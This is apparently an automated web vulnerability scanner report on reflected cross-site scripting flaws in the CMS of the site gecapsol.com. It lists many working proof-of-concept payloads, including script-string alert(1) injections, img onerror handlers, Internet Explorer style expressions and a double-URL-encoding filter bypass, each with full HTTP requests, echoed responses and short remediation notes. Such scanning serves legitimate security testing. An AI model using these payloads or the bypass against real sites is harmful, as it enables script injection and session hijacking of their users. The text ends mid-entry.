This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d750%2522%253e%253ca%253eac006d1ba9c/technology_finance/tech_pages/techadvise.html?print=yes HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:02:42 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=en6d750"><a>ac006d1ba9c; Expires=Fri, 25-Nov-2011 03:02:36 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:02:42 GMT Content-Type: text/html;charset=utf-8 Content-Length: 13169 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d750"><a>ac006d1ba9c/technology_finance/tech_pages/techadvise.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 889d0"-alert(1)-"3fbdcdf0013 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en889d0"-alert(1)-"3fbdcdf0013/technology_finance/tech_pages/techfinance.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:15 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=en889d0"-alert(1)-"3fbdcdf0013; Expires=Fri, 25-Nov-2011 03:03:07 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:15 GMT Content-Type: text/html;charset=utf-8 Content-Length: 13388 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en889d0"-alert(1)-"3fbdcdf0013/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8375"><img%20src%3da%20onerror%3dalert(1)>71421c64c10 was submitted in the REST URL parameter 6. This input was echoed as d8375"><img src=a onerror=alert(1)>71421c64c10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/end8375"><img%20src%3da%20onerror%3dalert(1)>71421c64c10/technology_finance/tech_pages/techfinance.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/end8375"><img src=a onerror=alert(1)>71421c64c10/technology_finance/tech_pages/techfinance.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33a9"><a%20b%3dc>e982d595b37 was submitted in the REST URL parameter 6. This input was echoed as b33a9"><a b=c>e982d595b37 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/b33a9"><a%20b%3dc>e982d595b37/technology_finance/tech_pages/techmanage.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:01 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=b33a9"><a b=c>e982d595b37; Expires=Fri, 25-Nov-2011 03:02:53 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:01 GMT Content-Type: text/html;charset=utf-8 Content-Length: 14186 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/b33a9"><a b=c>e982d595b37/technology_finance/tech_pages/techmanage.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42780"-alert(1)-"5fd0a1808a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/42780"-alert(1)-"5fd0a1808a6/technology_finance/tech_pages/techmanage.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:16 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=42780"-alert(1)-"5fd0a1808a6; Expires=Fri, 25-Nov-2011 03:03:09 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 14291 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/42780"-alert(1)-"5fd0a1808a6/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725e6"style%3d"x%3aexpression(alert(1))"c7800b57464 was submitted in the REST URL parameter 6. This input was echoed as 725e6"style="x:expression(alert(1))"c7800b57464 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/725e6"style%3d"x%3aexpression(alert(1))"c7800b57464/technology_finance/tech_pages/techrecovery.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 25 Nov 2010 03:03:02 GMT X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418) Set-Cookie: cms_preferred_language=725e6"style="x:expression(alert(1))"c7800b57464; Expires=Fri, 25-Nov-2011 03:02:53 GMT; Path=/cms/ Last-Modified: Thu, 25 Nov 2010 03:03:02 GMT Content-Type: text/html;charset=utf-8 Content-Length: 14618 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/725e6"style="x:expression(alert(1))"c7800b57464/technology_finance/tech_pages/techrecovery.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4540d"-alert(1)-"18e2547227e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d064540d"-alert(1)-"18e2547227e HTTP/1.1 Host: gecapsol.com Proxy-Connection: keep-alive Referer: http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06%22-alert(1)-%22c79e5188c0f/about_us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cms_preferred_language=en24d06"-alert(1)-"c79e5188c0f
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1980a"><img%20src%3da%20onerror%3dalert(1)>25244211e95 was submitted in the REST URL parameter 6. This input was echoed as 1980a"><img src=a onerror=alert(1)>25244211e95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d061980a"><img%20src%3da%20onerror%3dalert(1)>25244211e95 HTTP/1.1 Host: gecapsol.com Proxy-Connection: keep-alive Referer: http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06%22-alert(1)-%22c79e5188c0f/about_us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cms_preferred_language=en24d06"-alert(1)-"c79e5188c0f
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14561"><img%20src%3da%20onerror%3dalert(1)>244d4c0759c was submitted in the REST URL parameter 6. This input was echoed as 14561"><img src=a onerror=alert(1)>244d4c0759c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d0614561"><img%20src%3da%20onerror%3dalert(1)>244d4c0759c/ HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93ea6"-alert(1)-"b094eb9a3b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d0693ea6"-alert(1)-"b094eb9a3b/ HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6db73"-alert(1)-"ef10a784537 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066db73"-alert(1)-"ef10a784537/about_us HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e9c"style%3d"x%3aexpression(alert(1))"cc43d3477c8 was submitted in the REST URL parameter 6. This input was echoed as d2e9c"style="x:expression(alert(1))"cc43d3477c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06d2e9c"style%3d"x%3aexpression(alert(1))"cc43d3477c8/about_us HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b56e5"-alert(1)-"25a183d7df was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06b56e5"-alert(1)-"25a183d7df/about_us/businesses/corporate_aircraft_financing.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transition ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06b56e5"-alert(1)-"25a183d7df/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f464"%20style%3dx%3aexpression(alert(1))%207cd86ba461c was submitted in the REST URL parameter 6. This input was echoed as 6f464" style=x:expression(alert(1)) 7cd86ba461c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066f464"%20style%3dx%3aexpression(alert(1))%207cd86ba461c/about_us/businesses/corporate_aircraft_financing.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transition ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066f464" style=x:expression(alert(1)) 7cd86ba461c/about_us/businesses/corporate_aircraft_financing.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc08%2522%253e%253ca%253e2c32956579b was submitted in the REST URL parameter 6. This input was echoed as 2cc08"><a>2c32956579b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d062cc08%2522%253e%253ca%253e2c32956579b/about_us/businesses/distribution_finance.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transition ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d062cc08"><a>2c32956579b/about_us/businesses/distribution_finance.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d220"-alert(1)-"4c14e23dd1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d062d220"-alert(1)-"4c14e23dd1/about_us/help/FAQ.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6007d"><x%20style%3dx%3aexpression(alert(1))>12accc6ad35 was submitted in the REST URL parameter 6. This input was echoed as 6007d"><x style=x:expression(alert(1))>12accc6ad35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066007d"><x%20style%3dx%3aexpression(alert(1))>12accc6ad35/about_us/help/FAQ.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 547f4"-alert(1)-"29625e541f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06547f4"-alert(1)-"29625e541f6/about_us/index.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 690a7%2522%2520a%253db%2520e336d0e875e was submitted in the REST URL parameter 6. This input was echoed as 690a7" a=b e336d0e875e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06690a7%2522%2520a%253db%2520e336d0e875e/about_us/terms.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c69"><img%20src%3da%20onerror%3dalert(1)>88fc4424d2b was submitted in the REST URL parameter 6. This input was echoed as a4c69"><img src=a onerror=alert(1)>88fc4424d2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06a4c69"><img%20src%3da%20onerror%3dalert(1)>88fc4424d2b/financial_products/all_products/government.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06a4c69"><img src=a onerror=alert(1)>88fc4424d2b/financial_products/all_products/government.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ed20"-alert(1)-"7d0d9fcc5f3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068ed20"-alert(1)-"7d0d9fcc5f3/financial_products/all_products/government.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068ed20"-alert(1)-"7d0d9fcc5f3/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb628"><img%20src%3da%20onerror%3dalert(1)>34aec74f79c was submitted in the REST URL parameter 6. This input was echoed as bb628"><img src=a onerror=alert(1)>34aec74f79c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06bb628"><img%20src%3da%20onerror%3dalert(1)>34aec74f79c/financial_products/all_products/purchase_order.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06bb628"><img src=a onerror=alert(1)>34aec74f79c/financial_products/all_products/purchase_order.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cef40"-alert(1)-"41e95f2703f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06cef40"-alert(1)-"41e95f2703f/financial_products/all_products/purchase_order.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06cef40"-alert(1)-"41e95f2703f/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d4b6"-alert(1)-"d67c1395113 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/1d4b6"-alert(1)-"d67c1395113/financial_products/all_products/real_estate.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/1d4b6"-alert(1)-"d67c1395113/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fa2d"><img%20src%3da%20onerror%3dalert(1)>16cfe0bd4c2 was submitted in the REST URL parameter 6. This input was echoed as 4fa2d"><img src=a onerror=alert(1)>16cfe0bd4c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
